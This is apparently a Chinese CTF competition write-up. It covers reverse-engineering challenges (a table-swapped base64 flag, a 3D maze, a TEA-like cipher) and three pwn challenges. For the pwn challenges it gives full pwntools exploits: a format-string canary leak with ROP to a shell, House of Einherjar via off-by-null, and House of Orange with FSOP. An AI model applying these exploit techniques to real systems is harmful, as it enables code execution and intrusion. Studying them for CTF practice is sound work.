int main(int argc, char* argv[])
{
int a=0;
unsigned int b=0x12345678;
b=EP(b);
unsigned int aim[36]={0};
aim[35]=0xE7A35E0F;
aim[34]=0xFC93FC76;
aim[33]=0x6CFB29E0;
aim[32]=0x162FA567;
int i=0;
for( i=31;i>=0;i--){
aim[i]=EP(key[i + 4] ^ aim[i + 3] ^ aim[i + 2] ^ aim[i + 1])^aim[i+4];
}
for(i=0;i<4;i++){
rev(aim[i],(char*)&aim[i]);
}
char* t=(char*)aim;
for ( i = 0; i < 32; i += 2 )t[i] ^= 6u;
for ( i = 1; i < 32; i += 2 )t[i] ^= 7u;
getchar();
return 0;
}

mazeee

首先根据提示,可以看到base编码,动态调试发现base表被替换,直接换表base解码

1638068430200.png

1638068459074.png

1638068484680.png

得到,D0g3{Y0u^Can=So1ve_it!

然后继续分析迷宫,很容易看出来这是一个三维迷宫,并且可以算出步数应该为22

1638068515472.png

1638068538081.png

脚本如下:

1638068570639.png

1638068603043.png

1638068635296.png

跑出来是:dWWwwdddWWaawwddsssSaw

输入后,告诉我这个。。。。,字符串又说我前面有点问题,what?

1638068675789.png

既然都提醒了是前面,那大概率是下图这段了,不然出题人就疯了

1638068706481.png

1638068736634.png

1638068758077.png

411D80应该是420000数组的初始化函数,然而,420000数组内已经有东西了,并不是我们想的000000000(全局变量是这样的),说明题意大概就是根据420000内的数据,算出42024C的数据,1F和E0这两个数很特殊,看懂了吗,一个取高3位,一个取低5位

1638068794877.png

1638068804845.png

算法就如下吧,不过多阐述了,直接看代码

1638068829549.png

sign in

有部分smc,直接用ODdump出来

1.png

发现就是算法段

2.png

先是一个xor操作

3.png

进行置换操作,打乱字符顺序,并保存

4.png

先加密,然后结果去比较

5.png

有点像tea算法

6.png

V5我们不得而知,但是我们可以知道的是42CA44小于256,所以可以爆破

7.png

脚本如下

8.png

PWN

ez_stack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import*

context.log_level = "debug"

#io = process("./ezstack")
io = remote("47.108.195.119","20113")

def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")

enter()
io.sendline("%11$p%17$pa")
io.recvuntil("0x")
canary = int(io.recv(16),16)
io.recvuntil("0x")
main = int(io.recv(12),16)
pie = main - 0x9dc
ret = pie + 0x7c1
sh_addr = pie + 0xB24
system_plt = pie + 0x810
pop_rdi_ret = pie + 0xb03
success("canary:"+hex(canary))
success("pie:"+hex(pie))

payload = p64(0)*3 + p64(canary) + p64(0xdeadbeef) + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_plt)

io.recvline()
io.sendline(payload)
io.interactive()

1638068094102.png

如图 main_offset 为0xb + 6

canary_offset 为 0x5 + 6

第一发payload 通过泄露main地址得到程序基地址 和 canary

第二发payload 直接ret2libc shell

noleak

libc2.7 漏洞点为edit时的off by null

因为无size限制 直接先申请大chunk 然后释放进unsorted bin

然后在申请该unsortedbin的一部分 直接show得到libc

然后就是House Of Einherjar 需要注意填满tcache即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from pwn import*

context.log_level = "debug"

io = remote("47.108.195.119","20182")
#io = process("./pwn")

def menu(choice):
io.sendlineafter("4) delete a chunk",str(choice))

def add(index,size):
menu(1)
io.sendlineafter("Index?",str(index))
io.sendlineafter("Size?",str(size))

def delete(index):
menu(4)
io.sendlineafter("Index?",str(index))

def show(index):
menu(2)
io.sendlineafter("Index?",str(index))

def edit(index,content):
menu(3)
io.sendlineafter("Index?",str(index))
io.sendlineafter("content:",content)

def look():
global io
gdb.attach(io)

def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")

def secret():
enter()
io.sendlineafter("please input a str:","N0_py_1n_tHe_ct7")

def look():
global io
gdb.attach(io)

#leak_libc
secret()
add(0,0x420)
add(1,0x18)
delete(0)
add(0,0x18)
show(0)
io.recvuntil("\n")
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
libc = ELF("./libc.so.6",checksec = 0)
malloc_hook = info - 1104 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
add(0,0x400)

#
add(0,0xf8)
add(1,0x18)
add(2,0xf8)
for i in range(3,10):
add(i,0xf8)
for i in range(3,10):
delete(i)

#
delete(0)
edit(1,p64(0)*2+p64(0x100+0x20))
delete(2)

add(3,0xd0)
add(4,0x18)
add(5,0x18)
add(6,0x18)
delete(6)
delete(1)
edit(5,p64(free_hook))

add(7,0x18)
add(8,0x18)
edit(7,"/bin/sh\x00")
edit(8,p64(system))
delete(7)
io.interactive()

ez_heap

HITCON——houseoforange几乎一模一样

都是不限制size 然后漏洞为堆块溢出 只有add edit show

参考博客 :

https://blog.csdn.net/A951860555/article/details/116425824?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link

house of orange 泄露出libc 然后unsorted bin attack + FSOP attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import*

context.log_level = "debug"

io = process("./pwn")

#io = remote("47.108.195.119","20141")

def menu(choice):
io.sendlineafter("Your choice : ",str(choice))

def add(size,content):
menu(1)
io.sendlineafter("it\n",str(size))
io.sendlineafter("?\n",content)

def edit(size,content):
menu(2)
io.sendlineafter("it\n",str(size))
io.sendafter("name\n",content)

def show():
menu(3)

def look():
global io
gdb.attach(io)

def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")

#gdb.attach(p)
#enter()
add(0x10, "a")
edit(0x20,p64(0)*3+p64(0xfc1))

add(0x1000,"top_chunk to the unsorted_bin")

#fuck the libc and heap through the largebin
add(0x400,b"a"*8)
show()
libc = ELF("./libc.so.6",checksec = 0)
libc_info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
main_arena = libc_info- 1514
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
io_list_all = libc_base+libc.sym["_IO_list_all"]
system = libc_base+libc.sym["system"]

edit(0x10,b"a"*0x10)
show()
io.recvuntil(b"a"*0x10)
heap_info = u64(io.recvuntil("\n",drop = True).ljust(8,b"\x00"))
heap_base = heap_info & 0xfffffffffffff000

# unsorted_bin attack + FSOP
pad = cyclic(0x400)

fsop = b"/bin/sh\x00"+p64(0x61)+p64(0)+p64(io_list_all-0x10)
fsop += p64(0)+p64(1)
fsop = fsop.ljust(0xd8, b"\x00")
vtable_addr = heap_base+0x530
fsop += p64(vtable_addr)
fsop += p64(0)*3+p64(system)
pad += fsop
print(hex(system))
print(hex(io_list_all))

edit(len(pad),pad)
print(hex(heap_base))

menu(1)
io.sendlineafter("it\n",str(0x18))

io.interactive()


上一页
2021-11-28 13:28:00
下一页